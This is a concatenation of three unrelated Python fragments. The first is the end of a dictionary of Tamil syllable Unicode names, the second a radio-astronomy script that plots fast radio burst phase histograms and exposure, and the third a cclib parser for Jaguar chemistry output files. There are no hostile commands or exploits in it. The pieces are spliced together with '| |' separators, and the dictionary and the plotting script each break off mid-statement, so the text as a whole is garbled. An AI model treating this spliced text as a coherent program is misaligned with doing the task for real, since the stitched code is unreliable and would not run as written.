'TAMIL SYLLABLE KI': None,
'TAMIL SYLLABLE KII': None,
'TAMIL SYLLABLE KO': None,
'TAMIL SYLLABLE KOO': None,
'TAMIL SYLLABLE KSSA': None,
'TAMIL SYLLABLE KSSAA': None,
'TAMIL SYLLABLE KSSAI': None,
'TAMIL SYLLABLE KSSAU': None,
'TAMIL SYLLABLE KSSE': None,
'TAMIL SYLLABLE KSSEE': None,
'TAMIL SYLLABLE KSSI': None,
'TAMIL SYLLABLE KSSII': None,
'TAMIL SYLLABLE KSSO': None,
'TAMIL SYLLABLE KSSOO': None,
'TAMIL SYLLABLE KSSU': None,
'TAMIL SYLLABLE KSSUU': None,
'TAMIL SYLLABLE KU': None,
'TAMIL SYLLABLE KUU': None,
'TAMIL SYLLABLE LAA': None,
'TAMIL SYLLABLE LAI': None,
'TAMIL SYLLABLE LAU': None,
'TAMIL SYLLABLE LE': None,
'TAMIL SYLLABLE LEE': None,
'TAMIL SYLLABLE LI': None,
'TAMIL SYLLABLE LII': None,
'TAMIL SYLLABLE LLAA': None,
'TAMIL SYLLABLE LLAI': None,
'TAMIL SYLLABLE LLAU': None,
'TAMIL SYLLABLE LLE': None,
'TAMIL SYLLABLE LLEE': None,
'TAMIL SYLLABLE LLI': None,
'TAMIL SYLLABLE LLII': None,
'TAMIL SYLLABLE LLLAA': None,
'TAMIL SYLLABLE LLLAI': None,
'TAMIL SYLLABLE LLLAU': None,
'TAMIL SYLLABLE LLLE': None,
'TAMIL SYLLABLE LLLEE': None,
'TAMIL SYLLABLE LLLI': None,
'TAMIL SYLLABLE LLLII': None,
'TAMIL SYLLABLE LLLO': None,
'TAMIL SYLLABLE LLLOO': None,
'TAMIL SYLLABLE LLLU': None,
'TAMIL SYLLABLE LLLUU': None,
'TAMIL SYLLABLE LLO': None,
'TAMIL SYLLABLE LLOO': None,
'TAMIL SYLLABLE LLU': None,
'TAMIL SYLLABLE LLUU': None,
'TAMIL SYLLABLE LO': None,
'TAMIL SYLLABLE LOO': None,
'TAMIL SYLLABLE LU': None,
'TAMIL SYLLABLE LUU': None,
'TAMIL SYLLABLE MAA': None,
'TAMIL SYLLABLE MAI': None,
'TAMIL SYLLABLE MAU': None,
'TAMIL SYLLABLE ME': None,
'TAMIL SYLLABLE MEE': None,
'TAMIL SYLLABLE MI': None,
'TAMIL SYLLABLE MII': None,
'TAMIL SYLLABLE MO': None,
'TAMIL SYLLABLE MOO': None,
'TAMIL SYLLABLE MU': None,
'TAMIL SYLLABLE MUU': None,
'TAMIL SYLLABLE NAA': None,
'TAMIL SYLLABLE NAI': None,
'TAMIL SYLLABLE NAU': None,
'TAMIL SYLLABLE NE': None,
'TAMIL SYLLABLE NEE': None,
'TAMIL SYLLABLE NGAA': None,
'TAMIL SYLLABLE NGAI': None,
'TAMIL SYLLABLE NGAU': None,
'TAMIL SYLLABLE NGE': None,
'TAMIL SYLLABLE NGEE': None,
'TAMIL SYLLABLE NGI': None,
'TAMIL SYLLABLE NGII': None,
'TAMIL SYLLABLE NGO': None,
'TAMIL SYLLABLE NGOO': None,
'TAMIL SYLLABLE NGU': None,
'TAMIL SYLLABLE NGUU': None,
'TAMIL SYLLABLE NI': None,
'TAMIL SYLLABLE NII': None,
'TAMIL SYLLABLE NNAA': None,
'TAMIL SYLLABLE NNAI': None,
'TAMIL SYLLABLE NNAU': None,
'TAMIL SYLLABLE NNE': None,
'TAMIL SYLLABLE NNEE': None,
'TAMIL SYLLABLE NNI': None,
'TAMIL SYLLABLE NNII': None,
'TAMIL SYLLABLE NNNAA': None,
'TAMIL SYLLABLE NNNAI': None,
'TAMIL SYLLABLE NNNAU': None,
'TAMIL SYLLABLE NNNE': None,
'TAMIL SYLLABLE NNNEE': None,
'TAMIL SYLLABLE NNNI': None,
'TAMIL SYLLABLE NNNII': None,
'TAMIL SYLLABLE NNNO': None,
'TAMIL SYLLABLE NNNOO': None,
'TAMIL SYLLABLE NNNU': None,
'TAMIL SYLLABLE NNNUU': None,
'TAMIL SYLLABLE NNO': None,
'TAMIL SYLLABLE NNOO': None,
'TAMIL SYLLABLE NNU': None,
'TAMIL SYLLABLE NNUU': None,
'TAMIL SYLLABLE NO': None,
'TAMIL SYLLABLE NOO': None,
'TAMIL SYLLABLE NU': None,
'TAMIL SYLLABLE NUU': None,
'TAMIL SYLLABLE NYAA': None,
'TAMIL SYLLABLE NYAI': None,
'TAMIL SYLLABLE NYAU': None,
'TAMIL SYLLABLE NYE': None,
'TAMIL SYLLABLE NYEE': None,
'TAMIL SYLLABLE NYI': None,
'TAMIL SYLLABLE NYII': None,
'TAMIL SYLLABLE NYO': None,
'TAMIL SYLLABLE NYOO': None,
'TAMIL SYLLABLE NYU': None,
'TAMIL SYLLABLE NYUU': None,
'TAMIL SYLLABLE PAA': None,
'TAMIL SYLLABLE PAI': None,
'TAMIL SYLLABLE PAU': None,
'TAMIL SYLLABLE PE': None,
'TAMIL SYLLABLE PEE': None,
'TAMIL SYLLABLE PI': None,
'TAMIL SYLLABLE PII': None,
'TAMIL SYLLABLE PO': None,
'TAMIL SYLLABLE POO': None,
'TAMIL SYLLABLE PU': None,
'TAMIL SYLLABLE PUU': None,
'TAMIL SYLLABLE RAA': None,
'TAMIL SYLLABLE RAI': None,
'TAMIL SYLLABLE RAU': None,
'TAMIL SYLLABLE RE': None,
'TAMIL SYLLABLE REE': None,
'TAMIL SYLLABLE RI': None,
'TAMIL SYLLABLE RII': None,
'TAMIL SYLLABLE RO': None,
'TAMIL SYLLABLE ROO': None,
'TAMIL SYLLABLE RRAA': None,
'TAMIL SYLLABLE RRAI': None,
'TAMIL SYLLABLE RRAU': None,
'TAMIL SYLLABLE RRE': None,
'TAMIL SYLLABLE RREE': None,
'TAMIL SYLLABLE RRI': None,
'TAMIL SYLLABLE RRII': None,
'TAMIL SYLLABLE RRO': None,
'TAMIL SYLLABLE RROO': None,
'TAMIL SYLLABLE RRU': None,
'TAMIL SYLLABLE RRUU': None,
'TAMIL SYLLABLE RU': None,
'TAMIL SYLLABLE RUU': None,
'TAMIL SYLLABLE SAA': None,
'TAMIL SYLLABLE SAI': None,
'TAMIL SYLLABLE SAU': None,
'TAMIL SYLLABLE SE': None,
'TAMIL SYLLABLE SEE': None,
'TAMIL SYLLABLE SHAA': None,
'TAMIL SYLLABLE SHAI': None,
'TAMIL SYLLABLE SHAU': None,
'TAMIL SYLLABLE SHE': None,
'TAMIL SYLLABLE SHEE': None,
'TAMIL SYLLABLE SHI': None,
'TAMIL SYLLABLE SHII': None,
'TAMIL SYLLABLE SHO': None,
'TAMIL SYLLABLE SHOO': None,
'TAMIL SYLLABLE SHRII': None,
'TAMIL SYLLABLE SHU': None,
'TAMIL SYLLABLE SHUU': None,
'TAMIL SYLLABLE SI': None,
'TAMIL SYLLABLE SII': None,
'TAMIL SYLLABLE SO': None,
'TAMIL SYLLABLE SOO': None,
'TAMIL SYLLABLE SSAA': None,
'TAMIL SYLLABLE SSAI': None,
'TAMIL SYLLABLE SSAU': None,
'TAMIL SYLLABLE SSE': None,
'TAMIL SYLLABLE SSEE': None,
'TAMIL SYLLABLE SSI': None,
'TAMIL SYLLABLE SSII': None,
'TAMIL SYLLABLE SSO': None,
'TAMIL SYLLABLE SSOO': None,
'TAMIL SYLLABLE SSU': None,
'TAMIL SYLLABLE SSUU': None,
'TAMIL SYLLABLE SU': None,
'TAMIL SYLLABLE SUU': None,
'TAMIL SYLLABLE TAA': None,
'TAMIL SYLLABLE TAI': None,
'TAMIL SYLLABLE TAU': None,
'TAMIL SYLLABLE TE': None,
'TAMIL SYLLABLE TEE': None,
'TAMIL SYLLABLE TI': None,
'TAMIL SYLLABLE TII': None,
'TAMIL SYLLABLE TO': None,
'TAMIL SYLLABLE TOO': None,
'TAMIL SYLLABLE TTAA': None,
'TAMIL SYLLABLE TTAI': None,
'TAMIL SYLLABLE TTAU': None,
'TAMIL SYLLABLE TTE': None,
'TAMIL SYLLABLE TTEE': None,
'TAMIL SYLLABLE TTI': None,
'TAMIL SYLLABLE TTII': None,
'TAMIL SYLLABLE TTO': None,
'TAMIL SYLLABLE TTOO': None,
'TAMIL SYLLABLE TTU': None,
'TAMIL SYLLABLE TTUU': None,
'TAMIL SYLLABLE TU': None,
'TAMIL SYLLABLE TUU': None,
'TAMIL SYLLABLE VAA': None,
'TAMIL SYLLABLE VAI': None,
'TAMIL SYLLABLE VAU': None,
'TAMIL SYLLABLE VE': None,
'TAMIL SYLLABLE VEE': None,
'TAMIL SYLLABLE VI': None,
'TAMIL SYLLABLE VII': None,
'TAMIL SYLLABLE VO': None,
'TAMIL SYLLABLE VOO': None,
'TAMIL SYLLABLE VU': None,
'TAMIL SYLLABLE VUU': None,
'TAMIL SYLLABLE YAA': None,
'TAMIL SYLLABLE YAI': None,
'TAMIL SYLLABLE YAU': None,
'TAMIL SYLLABLE YE': None,
'TAMIL SYLLABLE YEE': None,
'TAMIL SYLLABLE YI': None,
'TAMIL SYLLABLE YII': None,
'TAMIL SYLLABLE YO': None,
'TAMIL SYLLABLE YOO': None,
'TAMIL SYLLABLE | |
<filename>scripts/frbpa_plotting.py
#!/usr/bin/env python3
import numpy as np
import pandas as pd
import json, logging
import argparse
import pandas as pd
from astropy.time import Time, TimeDelta
from astropy import units as u
import datetime
import pylab as plt
import matplotlib as mpl
from matplotlib.patches import Rectangle
from matplotlib.collections import PatchCollection
import matplotlib.gridspec as gridspec
from frbpa.utils import get_phase, get_cycle, get_params
logging_format = '%(asctime)s - %(funcName)s -%(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=logging_format)
def sort_dict(dictionary, list):
sorted_dict = {k: dictionary[k] for k in list if k in dictionary.keys()}
return sorted_dict
def open_json(data_file):
with open(data_file, 'r') as f:
data = json.load(f)
assert 'obs_duration' in data.keys()
assert 'bursts' in data.keys()
assert 'obs_startmjds' in data.keys()
burst_dict = data['bursts']
snr_dict = data['snr']
obs_duration_dict = data['obs_duration']
obs_startmjds_dict = data['obs_startmjds']
fmin_dict = data['freq_min']
fmax_dict = data['freq_max']
assert len(obs_duration_dict.keys()) == len(obs_startmjds_dict.keys())
assert len(obs_duration_dict.keys()) < 20
assert len(burst_dict.keys()) < 10
assert len(fmin_dict.keys()) == len(fmax_dict.keys())
telescopes = list(obs_duration_dict.keys())
new_obs_startmjds_dict = {}
new_obs_duration_dict = {}
fcen_dict = {}
for k in obs_startmjds_dict.keys():
start_times = obs_startmjds_dict[k]
durations = obs_duration_dict[k]
fmin = fmin_dict[k]
fmax = fmax_dict[k]
#new_start_times = []
new_durations = []
for i, t in enumerate(start_times):
new_durations.append(durations[i]/(3600))
new_obs_duration_dict[k] = new_durations
fcen_dict[k] = (fmax + fmin)/2
obs_duration_dict = new_obs_duration_dict
# Sorting dictionaries by central frequency
fcen_dict = {k: v for k, v in sorted(fcen_dict.items(),
key=lambda item: item[1])}
burst_dict = sort_dict(burst_dict, fcen_dict.keys())
snr_dict = sort_dict(snr_dict, fcen_dict.keys())
obs_duration_dict = sort_dict(obs_duration_dict, fcen_dict.keys())
obs_startmjds_dict = sort_dict(obs_startmjds_dict, fcen_dict.keys())
fmin_dict = sort_dict(fmin_dict, fcen_dict.keys())
fmax_dict = sort_dict(fmax_dict, fcen_dict.keys())
return burst_dict, snr_dict, obs_duration_dict, obs_startmjds_dict, fmin_dict, fmax_dict, fcen_dict
def open_csv(data_file):
burst_data = pd.read_csv(data_file)
burst_data['freq_cen'] = burst_data.loc[: , "freq_min":"freq_max"].mean(1)
burst_data['key'] = burst_data["telescope"] + '/' + burst_data["receiver"]
burst_dict = {}
fmin_dict = {}
fmax_dict = {}
fcen_dict = {}
for k in np.unique(burst_data['key']):
burst_dict[k] = burst_data.loc[burst_data['key'] == k]['mjd']
fmin_dict[k] = burst_data.loc[burst_data['key']==k]['freq_min'].iloc[0]
fmax_dict[k] = burst_data.loc[burst_data['key']==k]['freq_max'].iloc[0]
fcen_dict[k] = burst_data.loc[burst_data['key']==k]['freq_cen'].iloc[0]
fcen_dict = {k: v for k, v in sorted(fcen_dict.items(),
key=lambda item: item[1])}
burst_dict = sort_dict(burst_dict, fcen_dict.keys())
fmin_dict = sort_dict(fmin_dict, fcen_dict.keys())
fmax_dict = sort_dict(fmax_dict, fcen_dict.keys())
return burst_dict, fmin_dict, fmax_dict, fcen_dict
def make_obs_phase_plot(data_file, period, ref_mjd=58369.30, nbins=40, save=False,
show=False, log=False, min_freq=200, max_freq=2500):
"""
Generates burst phase and observation phase distribution plot for a given period.
:param data_file: json file with data
:param period: period to use for phase calculation
:param ref_mjd: reference MJD to use
:param nbins: number of bins in the phase histogram
:param save: to save the plot
:param show: to show the plot
"""
burst_dict, snr_dict, obs_duration_dict, obs_startmjds_dict, fmin_dict, fmax_dict, fcen_dict = open_json(data_file)
bursts = []
for k in burst_dict.keys():
bursts = bursts + burst_dict[k]
obs_duration = []
for k in obs_duration_dict.keys():
obs_duration = obs_duration + obs_duration_dict[k]
obs_startmjds = []
for k in obs_startmjds_dict.keys():
obs_startmjds = obs_startmjds + obs_startmjds_dict[k]
assert len(obs_startmjds) == len(obs_duration)
bursts = np.array(bursts)
obs_duration = np.array(obs_duration)
obs_startmjds = np.array(obs_startmjds)
obs_start_phases = get_phase(obs_startmjds, period, ref_mjd=ref_mjd)
hist, bin_edges_obs = np.histogram(obs_start_phases, bins=nbins)
obs_start_phases_dict = {}
duration_per_phase_dict = {}
burst_per_phase_dict = {}
duration_per_phase_tot = np.empty(nbins)
for k in obs_startmjds_dict.keys():
obs_start_phases_dict[k] = get_phase(np.array(obs_startmjds_dict[k]),
period, ref_mjd=ref_mjd)
durations = np.array(obs_duration_dict[k])
start_phases = obs_start_phases_dict[k]
d_hist = []
for i in range(len(bin_edges_obs)):
if i>0:
dur = durations[(start_phases < bin_edges_obs[i]) &
(start_phases > bin_edges_obs[i-1])].sum()
d_hist.append(dur)
duration_per_phase_tot[i-1] += dur
duration_per_phase_dict[k] = np.array(d_hist)
obs_duration = np.array(obs_duration)
duration_hist = []
for i in range(len(bin_edges_obs)):
if i>0:
duration_hist.append(
obs_duration[(obs_start_phases < bin_edges_obs[i]) &
(obs_start_phases > bin_edges_obs[i-1])].sum())
duration_hist = np.array(duration_hist)
bin_mids = (bin_edges_obs[:-1] + bin_edges_obs[1:])/2
phase_lst = []
for i,k in enumerate(burst_dict.keys()):
print("phase list", k, len(burst_dict[k]))
phase_lst.append(list(get_phase(np.array(burst_dict[k]), period,
ref_mjd=ref_mjd)))
burst_per_phase_dict[k], _ = np.histogram(phase_lst[-1],
bins=nbins, range=(0,1))
phase_tot = [p for l in phase_lst for p in l]
phase_tot.sort()
burst_tot, _ = np.histogram(phase_tot, bins=nbins, range=(0,1))
# PRINTING AVERAGE RATE PER INSTRUMENT
for i,k in enumerate(burst_dict.keys()):
tobs = np.sum(obs_duration_dict[k])
nbursts = len(burst_dict[k])
rate = nbursts / tobs
print("Average rate {}: {:.3f} / h".format(k, rate))
# off = np.where(burst_per_phase_dict[k] == 0)[0]
# on = np.where(burst_per_phase_dict[k] > 0)[0]
# print("Hours Apertif observed TOTAL: {:.2f}".format(
# np.sum(duration_per_phase_dict[k])))
# print("Hours Apertif observed during on phase: {:.2f}".format(
# np.sum(duration_per_phase_dict[k][on])))
# print("Hours Apertif observed during off phase: {:.2f}".format(
# np.sum(duration_per_phase_dict[k][off])))
# DEFINING COLORS
cm = plt.cm.get_cmap('Spectral_r')
burst_hist_colors = []
obs_hist_colors = {}
if 'uGMRT650' in obs_duration_dict.keys():
fcen_dict['uGMRT650'] = 1000
for i,k in enumerate(obs_duration_dict.keys()):
freq = np.log10(fcen_dict[k])
col = (np.log10(max_freq)-freq)/(np.log10(max_freq)-np.log10(min_freq))
color = cm(col)
print(k, mpl.colors.to_hex(color))
if k in burst_dict.keys():
burst_hist_colors.append(color)
obs_hist_colors[k] = color
rate_colors = {
'high': cm((np.log10(max_freq)-np.log10(1800))/(np.log10(max_freq)-np.log10(min_freq))),
'middle': cm((np.log10(max_freq)-np.log10(500))/(np.log10(max_freq)-np.log10(min_freq))),
'low': cm((np.log10(max_freq)-np.log10(300))/(np.log10(max_freq)-np.log10(min_freq)))
}
if 'uGMRT650' in obs_duration_dict.keys():
fcen_dict['uGMRT650'] = 650
# PLOTTING
fig, ax = plt.subplots(2, 1, sharex=True, figsize=(9,7),
gridspec_kw={'height_ratios': [1,1]})
ax1 = ax[0]
yhist,xhist,_ = ax1.hist(phase_lst, bins=bin_edges_obs, stacked=True,
density=False, label=burst_dict.keys(),
edgecolor='black', linewidth=0.5, color=burst_hist_colors)
ax1.set_ylabel('N. Bursts')
ax1.set_xlim(0,1)
print("YLIM", 0, int(yhist[-1].max()*1.1))
ax1.set_ylim(0, max(int(yhist[-1].max()*1.1), 4))
ax1.legend(loc=2)
ax1.text(-0.07, 0.95, "a", transform=ax1.transAxes, weight='bold')
ax2 = ax[1]
cum_ds = np.zeros(nbins)
for i, k in enumerate(duration_per_phase_dict):
d = duration_per_phase_dict[k]
ax2.bar(bin_edges_obs[:-1], d, width=bin_edges_obs[1]-bin_edges_obs[0],
align='edge', bottom=cum_ds, alpha=1,
label="{} {:d} MHz".format(k, int(fcen_dict[k])),
edgecolor='black', linewidth=0.2, color=obs_hist_colors[k])
cum_ds += d
ax2.set_xlabel('Phase')
ax2.set_ylabel('Obs. Duration (h)')
ax2.legend(loc=2)
ax2.text(-0.07, 0.95, "b", transform=ax2.transAxes, weight='bold')
plt.tight_layout()
if save:
print('Plot saved: ./burst_obs_phase_hist.png')
plt.savefig('./burst_obs_phase_hist.png', pad_inches=0,
bbox_inches='tight', dpi=200)
plt.savefig('./burst_obs_phase_hist.pdf', pad_inches=0,
bbox_inches='tight', dpi=200)
if show:
plt.show()
# SAVING COUNTS, OBS_DURATION AND PHASE BIN
if log:
print("Writing log")
dir_out = '/home/ines/Documents/projects/R3/periodicity/burst_phases/'
with open(dir_out+'counts_per_phase_p{:.2f}.txt'.format(period), 'w') as f:
f.write("# phase_bin counts chime_counts arts_counts lofar_counts obs_duration chime_duration arts_duration lofar_duration\n")
for i in range(nbins):
f.write("{:.3f} {} {} {} {} {:.3f} {:.3f} {:.3f} {:.3f}\n".format(
bin_mids[i], burst_tot[i],
burst_per_phase_dict["CHIME/FRB"][i],
burst_per_phase_dict["Apertif"][i],
burst_per_phase_dict["LOFAR"][i],
duration_per_phase_tot[i],
duration_per_phase_dict["CHIME/FRB"][i],
duration_per_phase_dict["Apertif"][i],
duration_per_phase_dict["LOFAR"][i]))
for i,k in enumerate(burst_dict.keys()):
if k == "CHIME/FRB":
inst = k.replace("/FRB", "")
else:
inst = k
np.save(dir_out + 'phase_{}_p{:.2f}_f{:.1f}'.format(inst, period,
fcen_dict[k]), [burst_dict[k], phase_lst[i]])
def make_obs_phase_plot_csv(data_file, period, ref_mjd=58369.30, nbins=40,
save=False, show=True, min_freq=900, max_freq=6000):
"""
Generates burst phase and observation phase distribution plot for a given period.
:param data_file: csv file with data
:param period: period to use for phase calculation
:param ref_mjd: reference MJD to use
:param nbins: number of bins in the phase histogram
:param save: to save the plot
:param show: to show the plot
"""
burst_dict, fmin_dict, fmax_dict, fcen_dict = open_csv(data_file)
burst_per_phase_dict = {}
phase_lst = []
for i,k in enumerate(burst_dict.keys()):
print("phase list", k, len(burst_dict[k]))
phase_lst.append(list(get_phase(np.array(burst_dict[k]), period,
ref_mjd=ref_mjd)))
burst_per_phase_dict[k], _ = np.histogram(phase_lst[-1],
bins=nbins, range=(0,1))
phase_tot = [p for l in phase_lst for p in l]
phase_tot.sort()
burst_tot, _ = np.histogram(phase_tot, bins=nbins, range=(0,1))
# DEFINING COLORS
cm = plt.cm.get_cmap('Spectral_r')
# burst_hist_colors = {}
burst_hist_colors = []
for i,k in enumerate(burst_dict.keys()):
freq = np.log10(fcen_dict[k])
col = (np.log10(max_freq)-freq)/(np.log10(max_freq)-np.log10(min_freq))
# freq = fcen_dict[k]
# col = (max_freq-freq)/(max_freq-min_freq))
color = cm(col)
# burst_hist_colors[k] = color
burst_hist_colors.append(color)
# PLOTTING
fig, ax1 = plt.subplots(1, 1, sharex=True, figsize=(9,7))
yhist,xhist,_ = ax1.hist(phase_lst, bins=nbins, range=(0,1), stacked=True,
density=False, label=burst_dict.keys(),
edgecolor='black', linewidth=0.5, color=burst_hist_colors)
ax1.set_ylabel('N. Bursts')
ax1.set_xlim(0,1)
ax1.set_ylim(0, int(yhist[-1].max()*1.1))
ax1.legend(loc=2)
if save:
print('Plot saved: ./burst_obs_phase_hist.png')
plt.savefig('./burst_obs_phase_hist.png', pad_inches=0,
bbox_inches='tight', dpi=200)
plt.savefig('./burst_obs_phase_hist.pdf', pad_inches=0,
bbox_inches='tight', dpi=200)
if show:
plt.show()
def make_obstime_plot(data_file, period, ref_mjd=58369.30, save=False,
show=False, max_freq=2500, min_freq=200):
"""
Generates observation exposure plot
:param data_file: json file with data
:param period: period to use for phase calculation
:param ref_mjd: reference MJD to use
:param cmap: matplotlib colormap to use
:param save: to save the plot
:param show: to show the plot
"""
burst_dict, snr_dict, obs_duration_dict, obs_startmjds_dict, fmin_dict, fmax_dict, fcen_dict = open_json(data_file)
# Defining duty cycle
frequency_hours = '%fH' % (24 * period)
t = Time(ref_mjd, format='mjd')
t0 = t+((period/2)*u.day)
tf = datetime.datetime.now()
t0_low = t+((period/2)*u.day) - (0.16 * period * u.day)
t0_high = t+((period/2)*u.day) + (0.16 * period * u.day)
df_period = [t0]
df_duty_low = [t0_low]
df_duty_high = [t0_high]
t_activity, t_low, t_high = t0, t0_low, t0_high
while t_activity < tf:
t_activity += period
t_low += period
t_high += period
df_period.append(t_activity)
df_duty_low.append(t_low)
df_duty_high.append(t_high)
n_periods = len(df_period)
# DEFINING COLORS
cm = plt.cm.get_cmap('Spectral_r')
burst_hist_colors = []
obs_hist_colors = {}
for i,k in enumerate(obs_duration_dict.keys()):
freq = np.log10(fcen_dict[k])
col = (np.log10(max_freq)-freq)/(np.log10(max_freq)-np.log10(min_freq))
# c = i/len(obs_duration_dict.keys())
color = cm(col)
# if k in burst_dict.keys():
# burst_hist_colors.append(color)
obs_hist_colors[k] = color
# PLOTTING
fig = plt.figure(figsize=(7,7))
gs = gridspec.GridSpec(2,1, wspace=0.01, height_ratios=[3,1])
ax1 = fig.add_subplot(gs[0, 0]) #ax[0]
for i,k in enumerate(burst_dict.keys()):
ax1.scatter(burst_dict[k], snr_dict[k],
color=obs_hist_colors[k], label=k, marker='o', edgecolor='k',
linewidth=0.5, zorder=10, s=12)
max_snr = max([m for k in snr_dict.keys()
for m in snr_dict[k]])*1.1
ax1.set_ylim(0, max_snr)
ax1.set_ylabel('SNR')
ax2 = fig.add_subplot(gs[1, 0], sharex=ax1) #ax[1]
for i, k in enumerate(obs_duration_dict.keys()):
#d = duration_per_phase_dict[k]
# ax.scatter(obs_startmjds_dict[k],
# [fcen_dict[k] for i in range(len(obs_startmjds_dict[k]))],
# color=obs_hist_colors[i])
obs_patches = | |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020, the cclib development team
#
# This file is part of cclib (http://cclib.github.io) and is distributed under
# the terms of the BSD 3-Clause License.
"""Parser for Jaguar output files"""
import re
import numpy
from cclib.parser import logfileparser
from cclib.parser import utils
class Jaguar(logfileparser.Logfile):
"""A Jaguar output file"""
def __init__(self, *args, **kwargs):
# Call the __init__ method of the superclass
super(Jaguar, self).__init__(logname="Jaguar", *args, **kwargs)
def __str__(self):
"""Return a string representation of the object."""
return "Jaguar output file %s" % (self.filename)
def __repr__(self):
"""Return a representation of the object."""
return 'Jaguar("%s")' % (self.filename)
def normalisesym(self, label):
"""Normalise the symmetries used by Jaguar.
To normalise, three rules need to be applied:
(1) To handle orbitals of E symmetry, retain everything before the /
(2) Replace two p's by "
(2) Replace any remaining single p's by '
"""
ans = label.split("/")[0].replace("pp", '"').replace("p", "'")
return ans
def before_parsing(self):
# We need to track whether we are inside geometry optimization in order
# to parse SCF targets/values correctly.
self.geoopt = False
def after_parsing(self):
# This is to make sure we always have optdone after geometry optimizations,
# even if it is to be empty for unconverged runs. We have yet to test this
# with a regression for Jaguar, though.
if self.geoopt and not hasattr(self, 'optdone'):
self.optdone = []
def extract(self, inputfile, line):
"""Extract information from the file object inputfile."""
# Extract the package version number.
if "Jaguar version" in line:
tokens = line.split()
base_version = tokens[3][:-1]
package_version = "{}+{}".format(base_version, tokens[5])
self.metadata["package_version"] = package_version
self.metadata["legacy_package_version"] = base_version
# Extract the basis set name
if line[2:12] == "basis set:":
self.metadata["basis_set"] = line.split()[2]
# Extract charge and multiplicity
if line[2:22] == "net molecular charge":
self.set_attribute('charge', int(line.split()[-1]))
self.set_attribute('mult', int(next(inputfile).split()[-1]))
# The Gaussian basis set information is printed before the geometry, and we need
# to do some indexing to get this into cclib format, because fn increments
# for each engular momentum, but cclib does not (we have just P instead of
# all three X/Y/Z with the same parameters. On the other hand, fn enumerates
# the atomic orbitals correctly, so use it to build atombasis.
#
# Gaussian basis set information
#
# renorm mfac*renorm
# atom fn prim L z coef coef coef
# -------- ----- ---- --- ------------- ----------- ----------- -----------
# C1 1 1 S 7.161684E+01 1.5433E-01 2.7078E+00 2.7078E+00
# C1 1 2 S 1.304510E+01 5.3533E-01 2.6189E+00 2.6189E+00
# ...
# C1 3 6 X 2.941249E+00 2.2135E-01 1.2153E+00 1.2153E+00
# 4 Y 1.2153E+00
# 5 Z 1.2153E+00
# C1 2 8 S 2.222899E-01 1.0000E+00 2.3073E-01 2.3073E-01
# C1 3 7 X 6.834831E-01 8.6271E-01 7.6421E-01 7.6421E-01
# ...
# C2 6 1 S 7.161684E+01 1.5433E-01 2.7078E+00 2.7078E+00
# ...
#
if line.strip() == "Gaussian basis set information":
self.skip_lines(inputfile, ['b', 'renorm', 'header', 'd'])
# This is probably the only place we can get this information from Jaguar.
self.gbasis = []
atombasis = []
line = next(inputfile)
fn_per_atom = []
while line.strip():
if len(line.split()) > 3:
aname = line.split()[0]
fn = int(line.split()[1])
prim = int(line.split()[2])
L = line.split()[3]
z = float(line.split()[4])
coef = float(line.split()[5])
# The primitive count is reset for each atom, so use that for adding
# new elements to atombasis and gbasis. We could also probably do this
# using the atom name, although that perhaps might not always be unique.
if prim == 1:
atombasis.append([])
fn_per_atom = []
self.gbasis.append([])
# Remember that fn is repeated when functions are contracted.
if not fn-1 in atombasis[-1]:
atombasis[-1].append(fn-1)
# Here we use fn only to know when a new contraction is encountered,
# so we don't need to decrement it, and we don't even use all values.
# What's more, since we only wish to save the parameters for each subshell
# once, we don't even need to consider lines for orbitals other than
# those for X*, making things a bit easier.
if not fn in fn_per_atom:
fn_per_atom.append(fn)
label = {'S': 'S', 'X': 'P', 'XX': 'D', 'XXX': 'F'}[L]
self.gbasis[-1].append((label, []))
igbasis = fn_per_atom.index(fn)
self.gbasis[-1][igbasis][1].append([z, coef])
else:
fn = int(line.split()[0])
L = line.split()[1]
# Some AO indices are only printed in these lines, for L > 0.
if not fn-1 in atombasis[-1]:
atombasis[-1].append(fn-1)
line = next(inputfile)
# The indices for atombasis can also be read later from the molecular orbital output.
self.set_attribute('atombasis', atombasis)
# This length of atombasis should always be the number of atoms.
self.set_attribute('natom', len(self.atombasis))
# Effective Core Potential
#
# Atom Electrons represented by ECP
# Mo 36
# Maximum angular term 3
# F Potential 1/r^n Exponent Coefficient
# ----- -------- -----------
# 0 140.4577691 -0.0469492
# 1 89.4739342 -24.9754989
# ...
# S-F Potential 1/r^n Exponent Coefficient
# ----- -------- -----------
# 0 33.7771969 2.9278406
# 1 10.0120020 34.3483716
# ...
# O 0
# Cl 10
# Maximum angular term 2
# D Potential 1/r^n Exponent Coefficient
# ----- -------- -----------
# 1 94.8130000 -10.0000000
# ...
if line.strip() == "Effective Core Potential":
self.skip_line(inputfile, 'blank')
line = next(inputfile)
assert line.split()[0] == "Atom"
assert " ".join(line.split()[1:]) == "Electrons represented by ECP"
self.coreelectrons = []
line = next(inputfile)
while line.strip():
if len(line.split()) == 2:
self.coreelectrons.append(int(line.split()[1]))
line = next(inputfile)
if line[2:14] == "new geometry" or line[1:21] == "Symmetrized geometry" or line.find("Input geometry") > 0:
# Get the atom coordinates
if not hasattr(self, "atomcoords") or line[1:21] == "Symmetrized geometry":
# Wipe the "Input geometry" if "Symmetrized geometry" present
self.atomcoords = []
p = re.compile(r"(\D+)\d+") # One/more letters followed by a number
atomcoords = []
atomnos = []
angstrom = next(inputfile)
title = next(inputfile)
line = next(inputfile)
while line.strip():
temp = line.split()
element = p.findall(temp[0])[0]
atomnos.append(self.table.number[element])
atomcoords.append(list(map(float, temp[1:])))
line = next(inputfile)
self.atomcoords.append(atomcoords)
self.atomnos = numpy.array(atomnos, "i")
self.set_attribute('natom', len(atomcoords))
# Hartree-Fock energy after SCF
if line[1:18] == "SCFE: SCF energy:":
self.metadata["methods"].append("HF")
if not hasattr(self, "scfenergies"):
self.scfenergies = []
temp = line.strip().split()
scfenergy = float(temp[temp.index("hartrees") - 1])
scfenergy = utils.convertor(scfenergy, "hartree", "eV")
self.scfenergies.append(scfenergy)
# Energy after LMP2 correction
if line[1:18] == "Total LMP2 Energy":
self.metadata["methods"].append("LMP2")
if not hasattr(self, "mpenergies"):
self.mpenergies = [[]]
lmp2energy = float(line.split()[-1])
lmp2energy = utils.convertor(lmp2energy, "hartree", "eV")
self.mpenergies[-1].append(lmp2energy)
if line[15:45] == "Geometry optimization complete":
if not hasattr(self, 'optdone'):
self.optdone = []
self.optdone.append(len(self.geovalues) - 1)
if line.find("number of occupied orbitals") > 0:
# Get number of MOs
occs = int(line.split()[-1])
line = next(inputfile)
virts = int(line.split()[-1])
self.nmo = occs + virts
